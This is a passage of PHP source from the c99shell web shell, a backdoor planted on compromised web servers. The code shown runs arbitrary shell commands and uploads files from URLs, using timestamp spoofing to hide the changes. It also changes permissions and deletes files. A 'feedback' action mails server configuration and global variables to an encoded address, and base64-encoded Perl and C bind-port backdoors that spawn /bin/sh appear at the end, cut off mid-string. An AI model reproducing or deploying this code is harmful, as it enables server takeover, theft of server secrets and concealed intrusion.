  1512. echo "\" readonly><br></center></form>";
  1513. }
  1514. if ($act == "fsbuff")
  1515. {
  1516. $arr_copy = $sess_data["copy"];
  1517. $arr_cut = $sess_data["cut"];
  1518. $arr = array_merge($arr_copy,$arr_cut);
  1519. if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  1520. else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";}
  1521. }
  1522. if ($act == "selfremove")
  1523. {
  1524. if (($submit == $rndcode) and ($submit != ""))
  1525. {
  1526. if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
  1527. else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1528. }
  1529. else
  1530. {
  1531. if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  1532. $rnd = rand(0,9).rand(0,9).rand(0,9);
  1533. echo "<form method=\"POST\"><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=\"hidden\" name=\"rndcode\" value=\"".$rnd."\"><input type=\"text\" name=\"submit\">&nbsp;<input type=\"submit\" value=\"YES\"></form>";
  1534. }
  1535. }
  1536. if ($act == "feedback")
  1537. {
  1538. $suppmail = base64_decode("Yzk5c2hlbGxAaW5ib3gucnU=");
  1539. if (!empty($submit))
  1540. {
  1541. $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  1542. $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  1543. if (!empty($fdbk_ref))
  1544. {
  1545. $tmp = @ob_get_contents();
  1546. ob_clean();
  1547. phpinfo();
  1548. $phpinfo = base64_encode(ob_get_contents());
  1549. ob_clean();
  1550. echo $tmp;
  1551. $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  1552. }
  1553. mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  1554. echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  1555. }
  1556. else {echo "<form method=\"POST\"><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
  1557. }
  1558. if ($act == "search")
  1559. {
  1560. echo "<b>Search in file-system:</b><br>";
  1561. if (empty($search_in)) {$search_in = $d;}
  1562. if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1563. if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1564. if (!empty($submit))
  1565. {
  1566. $found = array();
  1567. $found_d = 0;
  1568. $found_f = 0;
  1569. $search_i_f = 0;
  1570. $search_i_d = 0;
  1571. $a = array
  1572. (
  1573. "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  1574. "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  1575. "text_wwo"=>$search_text_wwo,
  1576. "text_cs"=>$search_text_cs,
  1577. "text_not"=>$search_text_not
  1578. );
  1579. $searchtime = getmicrotime();
  1580. $in = array_unique(explode(";",$search_in));
  1581. foreach($in as $v) {c99fsearch($v);}
  1582. $searchtime = round(getmicrotime()-$searchtime,4);
  1583. if (count($found) == 0) {echo "<b>No files found!</b>";}
  1584. else
  1585. {
  1586. $ls_arr = $found;
  1587. $disp_fullpath = true;
  1588. $act = "ls";
  1589. }
  1590. }
  1591. echo "<form method=\"POST\">
  1592. <input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><input type=\"hidden\" name=\"act\" value=\"".$dspact."\">
  1593. <b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
  1594. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  1595. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  1596. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
  1597. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
  1598. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1599. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1600. <br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
  1601. if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." directories, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
  1602. }
  1603. if ($act == "chmod")
  1604. {
  1605. $mode = fileperms($d.$f);
  1606. if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  1607. else
  1608. {
  1609. $form = true;
  1610. if ($chmod_submit)
  1611. {
  1612. $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  1613. if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";}
  1614. else {$err = "Can't chmod to ".$octet.".";}
  1615. }
  1616. if ($form)
  1617. {
  1618. $perms = parse_perms($mode);
  1619. echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".htmlspecialchars($surl)."\" method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  1620. }
  1621. }
  1622. }
  1623. if ($act == "upload")
  1624. {
  1625. $uploadmess = "";
  1626. $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  1627. if (empty($uploadpath)) {$uploadpath = $d;}
  1628. elseif (substr($uploadpath,-1,1) != "/") {$uploadpath .= "/";}
  1629. if (!empty($submit))
  1630. {
  1631. global $HTTP_POST_FILES;
  1632. $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1633. if (!empty($uploadfile["tmp_name"]))
  1634. {
  1635. if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
  1636. else {$destin = $userfilename;}
  1637. if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
  1638. }
  1639. elseif (!empty($uploadurl))
  1640. {
  1641. if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1642. else
  1643. {
  1644. $destin = explode("/",$destin);
  1645. $destin = $destin[count($destin)-1];
  1646. if (empty($destin))
  1647. {
  1648. $i = 0;
  1649. $b = "";
  1650. while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1651. }
  1652. if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  1653. else
  1654. {
  1655. $st = getmicrotime();
  1656. $content = @file_get_contents($uploadurl);
  1657. $dt = round(getmicrotime()-$st,4);
  1658. if (!$content) {$uploadmess .= "Can't download file!<br>";}
  1659. else
  1660. {
  1661. if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1662. $fp = fopen($uploadpath.$destin,"w");
  1663. if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  1664. else
  1665. {
  1666. fwrite($fp,$content,strlen($content));
  1667. fclose($fp);
  1668. if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1669. }
  1670. }
  1671. }
  1672. }
  1673. }
  1674. if ($miniform)
  1675. {
  1676. echo "<b>".$uploadmess."</b>";
  1677. $act = "ls";
  1678. }
  1679. else
  1680. {
  1681. echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
  1682. Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  1683. Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1684. Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1685. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  1686. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
  1687. <input type=\"submit\" name=\"submit\" value=\"Upload\">
  1688. </form>";
  1689. }
  1690. }
  1691. if ($act == "delete")
  1692. {
  1693. $delerr = "";
  1694. foreach ($actbox as $v)
  1695. {
  1696. $result = false;
  1697. $result = fs_rmobj($v);
  1698. if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  1699. }
  1700. if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  1701. $act = "ls";
  1702. }
  1703. if (!$usefsbuff)
  1704. {
  1705. if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
  1706. }
  1707. else
  1708. {
  1709. if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
  1710. elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
  1711. elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
  1712. if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
  1713. elseif ($actpastebuff)
  1714. {
  1715. $psterr = "";
  1716. foreach($sess_data["copy"] as $k=>$v)
  1717. {
  1718. $to = $d.basename($v);
  1719. if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1720. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1721. }
  1722. foreach($sess_data["cut"] as $k=>$v)
  1723. {
  1724. $to = $d.basename($v);
  1725. if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1726. unset($sess_data["cut"][$k]);
  1727. }
  1728. c99_sess_put($sess_data);
  1729. if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1730. $act = "ls";
  1731. }
  1732. elseif ($actarcbuff)
  1733. {
  1734. $arcerr = "";
  1735. if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1736. else {$ext = ".tar.gz";}
  1737. if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  1738. $cmdline .= " ".$actarcbuff_path;
  1739. $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1740. foreach($objects as $v)
  1741. {
  1742. $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  1743. if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  1744. if (is_dir($v))
  1745. {
  1746. if (substr($v,-1,1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  1747. $v .= "*";
  1748. }
  1749. $cmdline .= " ".$v;
  1750. }
  1751. $tmp = realpath(".");
  1752. chdir($d);
  1753. $ret = myshellexec($cmdline);
  1754. chdir($tmp);
  1755. if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  1756. $ret = str_replace("\r\n","\n",$ret);
  1757. $ret = explode("\n",$ret);
  1758. if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1759. foreach($sess_data["cut"] as $k=>$v)
  1760. {
  1761. if (in_array($v,$ret)) {fs_rmobj($v);}
  1762. unset($sess_data["cut"][$k]);
  1763. }
  1764. c99_sess_put($sess_data);
  1765. if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1766. $act = "ls";
  1767. }
  1768. elseif ($actpastebuff)
  1769. {
  1770. $psterr = "";
  1771. foreach($sess_data["copy"] as $k=>$v)
  1772. {
  1773. $to = $d.basename($v);
  1774. if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1775. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1776. }
  1777. foreach($sess_data["cut"] as $k=>$v)
  1778. {
  1779. $to = $d.basename($v);
  1780. if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1781. unset($sess_data["cut"][$k]);
  1782. }
  1783. c99_sess_put($sess_data);
  1784. if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1785. $act = "ls";
  1786. }
  1787. }
  1788. if ($act == "cmd")
  1789. {
  1790. if (trim($cmd) == "ps -aux") {$act = "ps_aux";}
  1791. else
  1792. {
  1793. @chdir($chdir);
  1794. if (!empty($submit))
  1795. {
  1796. echo "<b>Result of execution this command</b>:<br>";
  1797. $olddir = realpath(".");
  1798. @chdir($d);
  1799. $ret = myshellexec($cmd);
  1800. $ret = convert_cyr_string($ret,"d","w");
  1801. if ($cmd_txt)
  1802. {
  1803. $rows = count(explode("\r\n",$ret))+1;
  1804. if ($rows < 10) {$rows = 10;}
  1805. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1806. }
  1807. else {echo $ret."<br>";}
  1808. @chdir($olddir);
  1809. }
  1810. else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
  1811. echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  1812. }
  1813. }
  1814. if ($act == "ls")
  1815. {
  1816. if (count($ls_arr) > 0) {$list = $ls_arr;}
  1817. else
  1818. {
  1819. $list = array();
  1820. if ($h = @opendir($d))
  1821. {
  1822. while (($o = readdir($h)) !== false) {$list[] = $d.$o;}
  1823. closedir($h);
  1824. }
  1825. }
  1826. if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
  1827. else
  1828. {
  1829. //Building array
  1830. $objects = array();
  1831. $vd = "f"; //Viewing mode
  1832. if ($vd == "f")
  1833. {
  1834. $objects["head"] = array();
  1835. $objects["dirs"] = array();
  1836. $objects["links"] = array();
  1837. $objects["files"] = array();
  1838. foreach ($list as $v)
  1839. {
  1840. $o = basename($v);
  1841. $row = array();
  1842. if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  1843. elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  1844. elseif (is_dir($v))
  1845. {
  1846. if (is_link($v)) {$type = "LINK";}
  1847. else {$type = "DIR";}
  1848. $row[] = $v;
  1849. $row[] = $type;
  1850. }
  1851. elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  1852. $row[] = filemtime($v);
  1853. if (!$win)
  1854. {
  1855. $ow = @posix_getpwuid(fileowner($v));
  1856. $gr = @posix_getgrgid(filegroup($v));
  1857. $row[] = $ow["name"]."/".$gr["name"];
  1858. $row[] = fileowner($v)."/".filegroup($v);
  1859. }
  1860. $row[] = fileperms($v);
  1861. if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  1862. elseif (is_link($v)) {$objects["links"][] = $row;}
  1863. elseif (is_dir($v)) {$objects["dirs"][] = $row;}
  1864. elseif (is_file($v)) {$objects["files"][] = $row;}
  1865. }
  1866. $row = array();
  1867. $row[] = "<b>Name</b>";
  1868. $row[] = "<b>Size</b>";
  1869. $row[] = "<b>Modify</b>";
  1870. if (!$win)
  1871. {$row[] = "<b>Owner/Group</b>";}
  1872. $row[] = "<b>Perms</b>";
  1873. $row[] = "<b>Action</b>";
  1874. $k = $sort[0];
  1875. if (!is_numeric($k)) {$k = $sort[0] = 0;}
  1876. if ($sort[1] != "a") {$sort[1] = "d";}
  1877. $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($sort[1] == "a"?"d":"a")."\">";
  1878. $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($sort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  1879. $row[$k] .= $y;
  1880. for($i=0;$i<count($row)-1;$i++)
  1881. {
  1882. if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
  1883. }
  1884. $v = $sort[0];
  1885. usort($objects["dirs"], "tabsort");
  1886. usort($objects["links"], "tabsort");
  1887. usort($objects["files"], "tabsort");
  1888. if ($sort[1] == "d")
  1889. {
  1890. $objects["dirs"] = array_reverse($objects[dirs]);
  1891. $objects["files"] = array_reverse($objects[files]);
  1892. }
  1893. $objects = array_merge($objects["head"],$objects["dirs"],$objects["links"],$objects["files"]);
  1894. $tab = array();
  1895. $tab["cols"] = array($row);
  1896. $tab["head"] = array();
  1897. $tab["dirs"] = array();
  1898. $tab["links"] = array();
  1899. $tab["files"] = array();
  1900. foreach ($objects as $a)
  1901. {
  1902. $v = $a[0];
  1903. $o = basename($v);
  1904. $dir = dirname($v);
  1905. if ($disp_fullpath) {$disppath = $v;}
  1906. else {$disppath = $o;}
  1907. $disppath = str2mini($disppath,60);
  1908. if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1909. elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1910. foreach ($regxp_highlight as $r)
  1911. {
  1912. if (ereg($r[0],$o))
  1913. {
  1914. if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command"; exit;}
  1915. else
  1916. {
  1917. $r[1] = round($r[1]);
  1918. $isdir = is_dir($v);
  1919. if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  1920. {
  1921. if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  1922. $disppath = $r[2].$disppath.$r[3];
  1923. if ($r[4]) {break;}
  1924. }
  1925. }
  1926. }
  1927. }
  1928. $uo = urlencode($o);
  1929. $ud = urlencode($dir);
  1930. $uv = urlencode($v);
  1931. $row = array();
  1932. if ($o == ".")
  1933. {
  1934. $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
  1935. $row[] = "LINK";
  1936. }
  1937. elseif ($o == "..")
  1938. {
  1939. $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  1940. $row[] = "LINK";
  1941. }
  1942. elseif (is_dir($v))
  1943. {
  1944. if (is_link($v))
  1945. {
  1946. $disppath .= " => ".readlink($v);
  1947. $type = "LINK";
  1948. $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  1949. }
  1950. else
  1951. {
  1952. $type = "DIR";
  1953. $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  1954. }
  1955. $row[] = $type;
  1956. }
  1957. elseif(is_file($v))
  1958. {
  1959. $ext = explode(".",$o);
  1960. $c = count($ext)-1;
  1961. $ext = $ext[$c];
  1962. $ext = strtolower($ext);
  1963. $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  1964. $row[] = view_size($a[1]);
  1965. }
  1966. $row[] = date("d.m.Y H:i:s",$a[2]);
  1967. if (!$win) {$row[] = $a[3];}
  1968. $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  1969. if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
  1970. else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" id=\"ls_dir[]\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
  1971. if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
  1972. elseif (is_link($v)) {$tab["links"][] = $row;}
  1973. elseif (is_dir($v)) {$tab["dirs"][] = $row;}
  1974. elseif (is_file($v)) {$tab["files"][] = $row;}
  1975. }
  1976. }
  1977. //Compiling table
  1978. $table = array_merge($tab["cols"],$tab["head"],$tab["dirs"],$tab["links"],$tab["files"]);
  1979. echo "<center><b>Listing directory (".count($tab["files"])." files and ".(count($tab["dirs"])+count($tab["links"]))." directories):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
  1980. foreach($table as $row)
  1981. {
  1982. echo "<tr>\r\n";
  1983. foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  1984. echo "</tr>\r\n";
  1985. }
  1986. echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  1987. if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  1988. {
  1989. echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1990. }
  1991. echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
  1992. echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
  1993. echo "<option value=\"chmod\"".gchds($dspact,"chmod"," selected").">Change-mode</option>";
  1994. if ($usefsbuff)
  1995. {
  1996. echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
  1997. echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
  1998. echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
  1999. }
  2000. echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
  2001. echo "</form>";
  2002. }
  2003. }
  2004. if ($act == "bind")
  2005. {
  2006. $bndsrcs = array(
  2007. "c99sh_bindport.pl"=>
  2008. "IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
  2009. "WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
  2010. "TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
  2011. "RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
  2012. "bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
  2013. "Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
  2014. "biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
  2015. "XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
  2016. "ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
  2017. "ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
  2018. "c99sh_bindport.c"=>
  2019. "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
  2020. "cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
  2021. "CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
  2022. "ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
  2023. "Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
